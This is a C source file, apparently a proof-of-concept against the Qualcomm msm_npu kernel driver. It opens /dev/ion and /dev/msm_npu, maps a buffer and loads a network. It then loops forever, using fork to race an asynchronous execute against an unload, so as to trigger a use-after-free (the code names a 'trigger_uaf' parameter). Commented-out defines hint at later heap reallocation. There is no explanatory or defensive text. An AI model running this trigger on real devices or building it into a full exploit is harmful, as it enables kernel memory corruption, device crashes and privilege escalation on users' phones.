#include <err.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <sched.h>
#include <sys/un.h>
#include <pthread.h>
#include <stdint.h>
#include "npu_shell.h"


// #define NB_REALLOC_THREADS 8

// #define STATS_BUF_SIZE 16384

// #define OBJECT_SIZE 96

// #define NB_REALLOC_THREADS 8

// #define FAST_CPU 6


//cmd buffer
// static int cmd_arg = 0x40;

struct network_exec_param {
  int npu_fd;
  int ion_alloc_fd;
  uint64_t npu_phys_addr;
  uint32_t network_hdl;
  char stats_buf[256];
};

static int open_dev(char* name) {
  int fd = open(name, O_RDONLY);
  if (fd == -1) {
    warn("cannot open %s\n", name);
  }
  return fd;
}

static int allocate_ion(int ion_fd, size_t len) {
  struct ion_allocation_data ion_alloc_data;

  ion_alloc_data.len = len;
  ion_alloc_data.flags = 1;
  ion_alloc_data.heap_id_mask = ION_HEAP(25);
  if (ioctl(ion_fd, ION_IOC_ALLOC, &ion_alloc_data) < 0) {
	warn("ION_IOC_ALLOC failed\n");
  }
  return ion_alloc_data.fd;
}

static uint64_t npu_map_buf(int npu_fd, int ion_alloc_fd, size_t size) {
  struct msm_npu_map_buf_ioctl map_param;
  map_param.buf_ion_hdl = ion_alloc_fd;
  map_param.size = size;
  if (ioctl(npu_fd, MSM_NPU_MAP_BUF, &map_param) < 0) {
	warn("NPU_MAP_BUF failed\n");
  }
  return map_param.npu_phys_addr;  
}

static uint32_t npu_load_network(int npu_fd, int ion_alloc_fd, uint64_t npu_phys_addr) {
  struct msm_npu_load_network_ioctl network_param;
  network_param.buf_ion_hdl = ion_alloc_fd;
  network_param.buf_phys_addr = npu_phys_addr;
  network_param.buf_size = 0x10000;
  network_param.first_block_size = 0x1000;
  if (ioctl(npu_fd, MSM_NPU_LOAD_NETWORK, &network_param) < 0) {
	warn("Load network failed\n");
  }
  return network_param.network_hdl;
}

static uint32_t npu_load_network_v2(int npu_fd, int ion_alloc_fd, uint64_t npu_phys_addr) {
  struct msm_npu_load_network_ioctl_v2 network_param;
  struct msm_npu_patch_info_v2 patch_info_arr[2];

  for (int i = 0; i < 1; i++) {
    patch_info_arr[i].value = npu_phys_addr;
    patch_info_arr[i].chunk_id = i;
    patch_info_arr[i].instruction_size_in_bytes = 1;
    patch_info_arr[i].variable_size_in_bits = 8;
    patch_info_arr[i].shift_value_in_bits = 8;
    patch_info_arr[i].loc_offset = 0x1000;
  }

  network_param.buf_ion_hdl = ion_alloc_fd;
  network_param.buf_phys_addr = npu_phys_addr;
  network_param.buf_size = 0x4000;
  network_param.first_block_size = 0x1000;
  network_param.num_layers = 0;
  network_param.patch_info_num = 1;
  network_param.priority = 0;
  network_param.patch_info = (uint64_t)(&patch_info_arr[0]);
  if (ioctl(npu_fd, MSM_NPU_LOAD_NETWORK_V2, &network_param) < 0) {
	warn("Load network v2 failed\n");
  }
  return network_param.network_hdl;
}

static void npu_exec_network_v2(struct network_exec_param* network_exec_param, int trigger_uaf) {
  struct msm_npu_exec_network_ioctl_v2 exec_param_v2;
  struct msm_npu_patch_buf_info patch_buf_info_arr[2];
  int npu_fd = network_exec_param->npu_fd;

  for (int i = 0; i < 2; i++) {
    patch_buf_info_arr[i].buf_id = network_exec_param->npu_phys_addr;
    patch_buf_info_arr[i].buf_phys_addr = network_exec_param->npu_phys_addr;
  }

  exec_param_v2.stats_buf_addr = (uint64_t)(&(network_exec_param->stats_buf[0]));
  exec_param_v2.flags = 0x0e0e | 0x70200;
  exec_param_v2.async = 1;
  exec_param_v2.network_hdl = network_exec_param->network_hdl;
  exec_param_v2.stats_buf_size = 256;
  exec_param_v2.patch_buf_info_num = 2;
  exec_param_v2.patch_buf_info = (uint64_t)(&patch_buf_info_arr[0]);
  if (ioctl(npu_fd, MSM_NPU_EXEC_NETWORK_V2, &(exec_param_v2)) < 0) {
	  warn("NPU_EXEC_v2 failed\n");
  }
}

void npu_unload_network(int npu_fd, uint32_t network_hdl) {

 struct msm_npu_unload_network_ioctl unload_param;
 unload_param.network_hdl = network_hdl;
 if (ioctl(npu_fd, MSM_NPU_UNLOAD_NETWORK, &unload_param) < 0) {
   warn("unload network failed\n");
 }
}



void npu_demo() {
  while(1) {
    struct network_exec_param network_exec_param;
    int ion_fd = open_dev("/dev/ion");

    int npu_fd = open_dev("/dev/msm_npu");
    int ion_alloc_fd = allocate_ion(ion_fd, 0x1000);

    uint64_t npu_phys_addr = npu_map_buf(npu_fd, ion_alloc_fd, 0x1000);
    uint32_t network_hdl = npu_load_network_v2(npu_fd, ion_alloc_fd, npu_phys_addr);

    network_exec_param.npu_fd = npu_fd;
    network_exec_param.ion_alloc_fd = ion_alloc_fd;
    network_exec_param.npu_phys_addr = npu_phys_addr;
    network_exec_param.network_hdl = network_hdl;
    if(fork())
      npu_exec_network_v2(&network_exec_param, 0);
    else {
      npu_unload_network(npu_fd, network_hdl);
      exit(0);
    }

    close(npu_fd);
    close(ion_fd);
  }
}

int main() {
  npu_demo();
}
